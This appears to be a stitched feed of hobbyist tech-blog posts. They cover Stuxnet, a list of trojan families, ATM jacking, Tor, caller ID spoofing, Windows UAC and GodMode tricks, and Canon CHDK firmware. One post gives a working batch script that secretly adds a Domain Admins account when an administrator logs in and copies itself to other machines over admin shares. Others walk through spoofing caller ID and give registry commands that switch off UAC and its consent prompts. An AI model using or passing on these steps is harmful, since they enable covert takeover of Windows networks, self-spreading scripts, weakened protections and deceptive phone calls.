Ralph Langer spoke at TED and gives a startling clarity into the true nature of this virus. His short presentations gives some startling insight into the Stuxnet worm, and how it achieves it’s goals in four steps.

1. Infect as many computers possible, and spread.
2. If lands on a target computer, drop the payload.
3. The payload roots into a non windows based hardware PLC  Hardware that controls valves and reports values like temp, speed etc.  and reports “Good” values, while actually ignoring hi temps, and not closing valves like it should.
4. After causing some slight problems, the 2nd bigger payload destroys the machine in the nuclear facility, violently and effectively.

For those who haven’t heard, Stuxnet is a Windows computer worm discovered in July 2010 that targets industrial software and equipment.  It is the first known malware that sabotages very specific industrial systems, and the first to include a programmable logic controller (PLC) rootkit. Like a fisherman throwing a net trying to catch a fish, the worm beings by spreading as far and wide as possible. Once it lands on a suitable target (like an engineer’s laptop), it drops a highly specialized malware payload (bomb) that is designed to target only Siemens Supervisory Control And Data Acquisition (SCADA) systems that are configured to control and monitor specific industrial processes. Stuxnet infects PLCs by subverting the Step-7 software application that is used to reprogram these devices. Different versions of Stuxnet targeted five Iranian organisations, with the probable target suspected to be uranium enrichment infrastructure in Iran.  Symantec noticed in August 2010 that 60% of the infected computers worldwide were in Iran. Siemens stated on November 29 that the worm has not caused any damage to its customers, but the Iran nuclear program, which uses embargoed Siemens equipment procured clandestinely, has been damaged by Stuxnet. Kaspersky Labs concluded that the sophisticated attack could only have been conducted “with nation-state support” and it has been speculated that Israel may have been involved.

Jokes aside, Trojans are somewhat either mystify people, or they completely misunderstand them. Well I though that I would clear up some confusion for anyone out there who either has it backwards or just doesn’t know. Some may remember the story of the Trogan horse from classical Greek parables. The story maybe true or not, but it illustrates a good point. Never trust a gift from an enemy.

The classic and simple statement that a Trojan is a program hiding inside another one, that appears safe, or good. While the simplicity of that statement echo’s it’s elegance, it also belies the extent of the danger. So I’ll give you some working examples of a few Trojans in the wild today that you either will, or have already come across in your travels on the web.

If you go to http://www.kaspersky.com/viruswatchlite?search_virus=trojan&x=0&y=0&hour_offset=-9 you will see a list of top detected trojans by the hour. (So, obviously this list is subject to change) But what won’t change is the fact that the list is full of detected trojans. It’s just a list showing the latest detected viruses, and the ones with the most infections rise to the top. Let’s touch on a few of them on the list, by categories.

• Trojan.Win32.FakeAV.afgm
  • This category (FakeAV) is like the name suggest, a FAKE AntiVirus. They actually buy ads on websites to help spread this stuff around. The adverts are designed to look like warning boxes, which deceive naive users into thinking that they are infected, and unless they click, download and install the fake software, they are in danger. The unfortunate side to this is the case is usually the opposite. They don’t have a virus until they click the ad, and are now “held hostage”   for a sum of money, usually $99 with a nonrefundable $1 fee. Millions have been infected by these Fake Antiviruses. After paying, they don’t get any response, and their credit card number is sometimes sold on the black market used to buy gas and goods in stores, so the thieves get away uncaught.
• Trojan.Win32.FraudPack.cnnd
  • Once it enters in your system and executed then the virus opens up a backdoor on your system with no security. In this way more malware enters your system at regular intervals that destroys your operating system. This done without the users innervation. It is one of the ways that FakeAV gets on to your computer (See above)
• Trojan.Win32.Refroso.cwvx
  • (From Microsoft) Worm:Win32/Refroso.xxx  is a worm that stops Windows Security Center and attempts to spread to other computers across a network by exploiting a vulnerability in Windows. No user action is required. You could say this is akin to the AIDS virus, as by disabling your firewall, it let’s other viruses come in.
• Trojan.Win32.Scar.dmsw
  • The installation of Trojan.Scar.hej may come from a malicious web site or the download of a deceptive file from an unknown source.
    So in other words, you are surfing happily along, and then you are infected. :[
• Trojan.Win32.VBKrypt.benv
  • VBKrypt is a large family of trojans. These trojans may be written in Visual Basic. Depending on the specific variant, the trojan may drop files, write to the registry and perform other unauthorized actions on the affected computer system. Like the FakeAV category, there are many type of variants in this family.
• Trojan.Win32.Buzus.gwzz
  • Trojan.Buzus opens a backdoor on the infected machine and tries to steal various information like personal financial data (like credit card numbers, online banking details etc.)  passwords from various email and FTP applications (like Trillian, Microsoft Outlook, CuteFTP etc.) It also tries to compromise security settings of various security related products. Kind of a wonder bug,  this trojan is easier to detect, because it starts pilfering through everything.
• Trojan-Spy.Win32.Zbot.azng
  • ZBot.HS  was discovered on February 20th 2008 and targets the online banking portal Finnish bank; the spam e-mail messages used to distribute its executably binary file are written in Finnish. This trojan can actually take small amounts of money from your bank account at a time. You should please contact your bank and confirm your online banking transactions if infection is confirmed. -That’s strong advice!
• Trojan.Win32.Genome.rdrl
  • Trojan.Win32.Genome is a trojan that will spread via instant messaging software and has another payload of downloading and executing a variants of W32.Spybot.Worm on compromised computer.  Pretty low risk for this one, but it’s in the wild in large numbers still.
• Trojan-Spy.Win32.WinSpy.big
  • Win-Spy can do  screen capture, keyword alerts, email monitoring, web cam monitoring and recording, microphone monitoring and recording, brower monitoring and recording. These functions can be done locally and remotely. It is often used for remote surveillance by attackers to snoop on other people. It falls under the broader category “Remote Access Trojan“.

So you can see that while they do a wide variety  of things, the common denominator is that they all deceive the end user to gain access. Now before you linux and Mac guys go crazy talking about Windows security, consider this. Most of these wouldn’t exist if people couldn’t be deceived. That’s the real source of insecurity in the system. The next problem is that the smarter you make people, the smarter the virus authors are forced to get to compensate. So take it for what you will, but until then knowledge is power.

I could have easily called this article “How to hack and take control of an entire Windows Network” but that would draw a lot of negative attention, and it probably should. Let’s start off with a little background on the terminology for those who don’t know that much about Window’s methods of networking. (You can skip to the next section otherwise) A “Domain Admins” is is the security group for users who have administrator rights on every machine that is a member of the domain. A domain is like a workgroup of computers that are under control of the local Active Directory Server. If you’re not in the domain you don’t have access to much. We’re going to change that, by gaining this level of access. There are two basic types of users. Administrators, and Users. Users aren’t allowed to do very much, can’t install software, change things, etc. Whereas Administrators have total control. Local administrators have control of that one computer only. Domain Administrators have control over all pc’s that are part of the domain. In particular they have access to the root share, C$ the default share on every windows professional based pc. If you can become Domain admin, you can access every file on every computer through this share!  Now many legacy applications will fail to run as a simple user, so it’s common practice to make a “User” a “Local Admin” of a computer. That means that user has access to add printers, add/remove software of their own pc. This was the pc is still managed, but the user has more freedom to blow up their computer doing awesome stunts like deleting c:/windows/system32 to save space. “But I don’t use that so I thought it was ok to delete…”  If you can grasp all that, I’ll go ahead into the description of the “How” you elevate from “Local Admin” to “Domain Admin”

How to a turn my local admin into a Domain admin?

Ok, this is where I’m going to scare you a bit. It’s easy, you don’t need any tools, or the advanced knowledge of expert know how. You only need to type these two lines into a batch file!

net user /domain /add dirtyhackor mysecretpass

net group /domain "Domain Admins" /add dirtyhackor

What's this batch file doing in my startup folder!

The first line creates a new user on the domain name dirtyhackor and the second line add that user to the Domain Admins Group. The masters of Windows domains maybe laughing right now, because they know this script won’t fly as it. Because the users don’t have access to create users, and they will only get an error, and Mr. Admin you are to sly to run a batch script without reading it first right? Well how about these apples, place the script in the all users folder under Programs in the “Startup Folder” on this computer. Now when the domain admin walks by to fix your computer, when they log in they will unknowingly run this script and voila! Now you have a secretly created user called “dirtyhackor” on the domain with full access to everything!

But how to get a domain admin to access your computer? A little sabotage can usually get a member of the domain to sign into your(target) computer. Many users are also members of multiple computers as well. What if you wanted to get you’re newly found batch script on to all of the computer’s you are a local admin? Just one more line of batch will let us easily spread the script to other computers over the network!

net user /domain /add dirtyhackor mysecretpass
net group /domain "Domain Admins" /add dirtyhackor

for /F %%i in ('net view') do copy /Y %0 "%%ic$documents and settingsall usersstart menuprogramsstartup"

As you can see, the two lines above are the same as in the previous example, but the third line will scan for all pc’s on the local network, and for the ones that you have local admin rights to, will copy this script to each computer you have access to! So let’s say three people work at the one workstation. Sam logs in, and this spreads to all computers he has access to. Then Sally logs in and it spreads to all of her workstations, Followed by Steve. If they all have access to 3 computers each, that’s 7 computers with the script on it now. Then if anyone uses their computers…. the pattern of spreading continues throughout the network! Eventually a domain admin will run the script and you’re in!

Ramifications

What can you do with this power? Install software on any pc, remotely, keyloggers,send spam, webservers, game servers, backup storage, anything you would want to. SO if you’re a network admin (Like me) You’re probably really thinking about all the times you’ve logged in to a workstation! So what can you do against this threat? Well being aware of this type of trickery is a start, and secondly, make sure you assign domain admin to as few people as possible.

Spread the word! E-mail this to someone who you know needs to be aware of this, and please stumble or dig this, as that will really help get the word out! Thanks for reading!!! +Green

Astonished I looked upon Barnaby Jack’s demonstration of “ATM Jacking”. Every script kiddies dream come true of having an ATM machine spew forth a pile of money was being played out by Barnaby Jack on the first day of Black Hat, a annual security conference held by Hackers  along with representatives of federal agencies and corporations. (Link is to Wikipedia Page)

Basically the attacks work simply enough, Barnaby wrote a program that remotely infects the ATM machine, and with the unauthorized software on the ATM he could approach the machine and either press a secret key combo or swipe a special card, and make the ATM unload all it’s cash. Out of 4 ATM brands Barnaby found the first four he tried exploitable, out  of four. “Four for Four” he said. On the first one he used a simple debugging method to launch internet explorer and download his trojan, on another he bought an update license and got the code to send the rootkit as a fake update.

Probably the scariest and most amazing thing, is that he wrote his presentation over a year ago, for the last Black Hat conference, but wasn’t allowed to demo his findings. Since last November the ATM manufacturers have stated that they have fixed all the security holes presented, but Barnaby says there are still more he hasn’t disclosed yet. The types of ATMs effected are the smaller ones that run Windows CE, kiosk style ATM Machines like in gas stations and movie theaters. The larger ones at Banks are more secure and do not rely on dial up modems and public internet lines to connect to their servers.

In light of the recent ban of Facebook in Pakistan I’m going to show you how to bypass any web filter,maintain the highest form of privacy, on ANY computer, and without installing any software or visiting lame “proxy” websites! And it’s all thanks to Torfox, a derivative of Firefox and Tor mashed together! Tor uses multiple layeres of cryptography (hence the Onion routing analogy), ensuring perfect forward secrecy between routers (You and your destination). In short, TOTAL PRIVACY, and BYPASSES WEB FILTERS.

Simply go to http://torfox.org/ and download the portable Torfox Zipped package, and extract it to a folder, preferably on a flash drive.

Then run torfox.exe and it will open a slim looking version of Firfox. The first page won’t load right away, it could take up to three mins to connect, but then once it does, you can surf anywhere, without limits or worries!

Screencast coming soon!

Pretending to be someone your not is always alot of fun, but sometimes it’s actually necessary, like when you are a debt collector and your calls are being screened. This of course as you can guess, be misused quite badly, however to show you how easy it actually is, I’ll guide you through the process of showing a fake number on the Caller ID of whoever you want to call.

Caller ID Spoofing, is actually pretty darn easy!

First, goto this address

http://bluffmycall.com/free/

Fill out the form, you’ll need to put in your own number, and the number you want to call, and the number you want them to see.

Then Dial the phone number that they provide, and after listening to a short ad, they connect the call and spoof everything for you.

Try it out, it’s pretty simple! Remember, don’t do anything illegal, I’m sure all that data gets logged somewhere!

Anyone have any experience with this or any other Caller ID spoofing vendors?

You can script UAC on and off with these commands:

Disable UAC

%windir%System32cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 0 /f

Enable UAC

%windir%System32cmd.exe /k %windir%System32reg.exe ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v EnableLUA /t REG_DWORD /d 1 /f

Shell Execute these commands with any scripting language, or even just by typing them in! But remember, you or your script need administrator rights.

And optionally, the following comand to suppress all elevation consent request and notification:

%windir%System32cmd.exe /k %windir%System32reg.exe ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

And before you ask, yes, that’s the UAC logo from Quake

I’ve posted before about a “GodMode” in Win7. This time I will tell you about the other GUID’s that directly access the sub panels with in the GodMode Panel.

Same as before, make a new folder, anywhere, and raname it to one of the names below to create that control panel.

Here are all the GUID codes I could find around the net that activate different control panels:

Ever have trouble changing your IP address in Windows 7? Just having to adjust to a new operating system is a total shock for most people. All the places where settings used to be are all moved or rearranged. Microsoft really paid attention to making the systems easier to learn for beginners, so if you have never used a pc before that’s great but for those of us who have, relearning actually puts us to a disadvantage.

Win7 has cheat codes?

Enter the “Godmode” Folder. Ok I know that this is not a new trick, and that it’s been brought back to life by the colorful naming but I must admit, I like it easy, and “Godmode” makes it easy. I have found this to be quite useful so I decided I would share it with you.

Godmode is a reference to the old IDDQD cheat code in ID Software’s Doom game series. IDDQD made your player invincible ie: godlike.  IDKFA gave the player all the weapons, and all the keys to all  the doors in the game. This is kinda similar to the latter as it gives you every control panel that is spread throughout the computer, on one screen. I remember how difficult it was to find the new Add Remove Programs, well not anymore! IP address settings? Not any more! This is pretty humorous as “Godmode” really has nothing to do with creating Control Panel Icons.

Gaining this super elite Godmode over your computer is actually pretty simple! Just create a folder, anywhere, and rename it to: GODMODE.{ED7BA470-8E54-465E-825C-99712043E01C}

You can copy / paste that into the rename field to make it easier. This will grant you access to ALL system settings in one location. Which in Win7 can be pretty handy. If you’re like the average person, finding where Microsoft has moved everything to can be tiresome. Having it all in one place is really helpful.

Want to really impress your friends? Well Godmode has nothing to do with this Hack. Actually the GUI ID in the name is everything to do with it, that word in front of the period is just what the folder will end up being named. The word before the period/fullstop can be whatever you want to call the folder. So Green_CompleX.{ED7BA470-8E54-465E-825C-99712043E01C} Would work just as well, but the functionality is really the most interesting part of all. Enjoy exploring all those hard to find settings!

Just right click your desktop, and goto new, then click on folder name it:

GODMODE.{ED7BA470-8E54-465E-825C-99712043E01C}

Some Screenies for the nonbelievers:

And the coup de gras:

*Special thanks to a reader for pointing out my typo in the Cheat code for DOOM..

What is CHDK? It’s a firmware enhancement (I like that word because it’s not a replacment) that work on many of Canons Cameras. CHDK gets loaded into your camera’s memory upon bootup (either manually or automatically). It provides additional functionality beyond that currently provided by the native camera firmware. The CHDK project allows users to non-destructively modify the firmware and write custom programs with new features.

CHDK is not a permanent firmware upgrade: you decide how it is loaded (manually or automatically) and you can always easily remove it.

Quick answers to 7 key questions about CHDK:

1. What is CHDK?

CHDK is not just one thing! The term CHDK refers to free software – currently available for many (but not all) Canon PowerShot compact digital cameras – that you can load onto your camera’s memory card to give your camera greatly enhanced capabilities.

2. Am I likely to be interested in CHDK?

The enhanced capabilities that CHDK provides are most likely to be of interest to experienced photographers – if you believe that your Canon PowerShot camera already has more features than you will ever need, you probably won’t be interested in CHDK.

3. Is CHDK safe to use?

Probably. See this page for more information

4. How does CHDK work?

CHDK makes use of the microprocessor that controls the camera (every digital camera contains a microprocessor) to act as a programmable computer that provides the extra capabilities.

5. What extra capabilities does CHDK provide?

The current set of extra capabilities fall into six categories:

a. Enhanced ways of recording images – you can capture still pictures in RAW format (as well as JPEG), and for video images you can have increased recording time and length (1 hour or 2 GB), and a greatly increased range of compression options.

b. Additional data displays on the LCD screen – histogram, battery life indicator, depth of field, and many more.

c. Additional photographic settings that are not available on the camera by itself – longer exposure times (up to 65 seconds), faster shutter speeds (1/25,000 sec, and faster in some cases), automatic bracketing of exposure, etc.

d. The ability for the camera to run programs (‘scripts’, written in a micro-version of the BASIC language) stored on the memory card – these programs allow you to set the camera to perform a sequence of operations under the control of the program. For example, a camera can be programmed to take multiple pictures for focus bracketing, or take a picture when it detects that something in the field of view moves or changes brightness.

e. The ability to take a picture, or start a program on the memory card, by sending a signal into the USB port – you can use the USB cable to take a picture remotely.

f. The ability to do a number of other more useful (and fun) things, such as act as a mini file browser for the memory card, let you play games on the LCD screen, etc.

6. What else should I know?

Developers around the world are continuing to add new features to CHDK. Because the idea of using the camera’s microprocessor is so flexible, various developers have made different versions of CHDK, and new features continue to be developed – for example, one version of CHDK has features assist in taking stereo photographs, and even allows two cameras to be synchronized to take pictures at the same time (with an accuracy of better than 0.1 milliseconds, providing they are the same camera model).

7. How do I get started with CHDK?

See CHDK for Dummies and the Firmware Usage page !!!

(http://chdk.wikia.com/wiki/FAQ , http://chdk.wikia.com/wiki/CHDK_for_Dummies and http://chdk.wikia.com/wiki/CHDK_firmware_usage)

A sampling of those additional features/functionality.

Main features:

• Save images in RAW format
• Ability to run “Scripts” to automate the camera
• Live histogram (RGB, blended, luminance and for each RGB channel)
• Zebra mode (blinking highlights and shadows to show over/under exposed areas)
• An “always on” full range Battery indicator
• Ability to turn off automatic dark-frame subtraction
• a higher compression movie mode, and double the maximum video file size
• exposure times as long as 65 seconds
• exposure times as little as 1/10,000 of a second
• ability to use the USB port for a remote trigger input

Additional features:

• a depth-of-field (DOF)-calculator
• File browser
• Text reader
• Calendar
• Some fun tools and games

Why would I want to use CHDK?

• To get Raw file capability on cameras that don’t have that ability
• To get the ability to use scripts
• to be able to know the battery status at all times (not just when it’s about to run out of power)
• you want or need any of the other enhancement features that CHDK provides

What are scripts? Scripts are BASIC language programs that give you the ability to control the operation of the camera under program control. They have been used to add or extend the native capability of the camera: more flexible intervalometers, extended-range exposure compensation, extended bracketing ability, lightning photography, etc. See the script pages for more details.

Beyond “Standard” CHDK

Several developers have extended the basic features of CHDK to add additional major functions. You’ll find these extended features in “special builds”.

There are several “Motion Detection” versions available that allow scripts to detect when motion (or any change in light intensity) occurs in one or more predefined regions of the images (the script can then take a photograph, a video, start a timer, etc) and there are some *very* cool applications based on this implementation.

There is a “Stereo Data Maker” (SDM) version, specifically geared to stereo image applications (which also incorporates the Motion Detection routines).

Additional video compression options (more or less), and the ability to go beyond the 1 Gbyte limit.

Use your USB port as a remote control / “cable release”.

See the CHDK Special Builds section at the bottom of the front page for more information, and then follow the links to the developers’ pages for the details.

]]> http://green.cx/dark-tech/chdk-canon-cameras-feet-wet/feed/ 1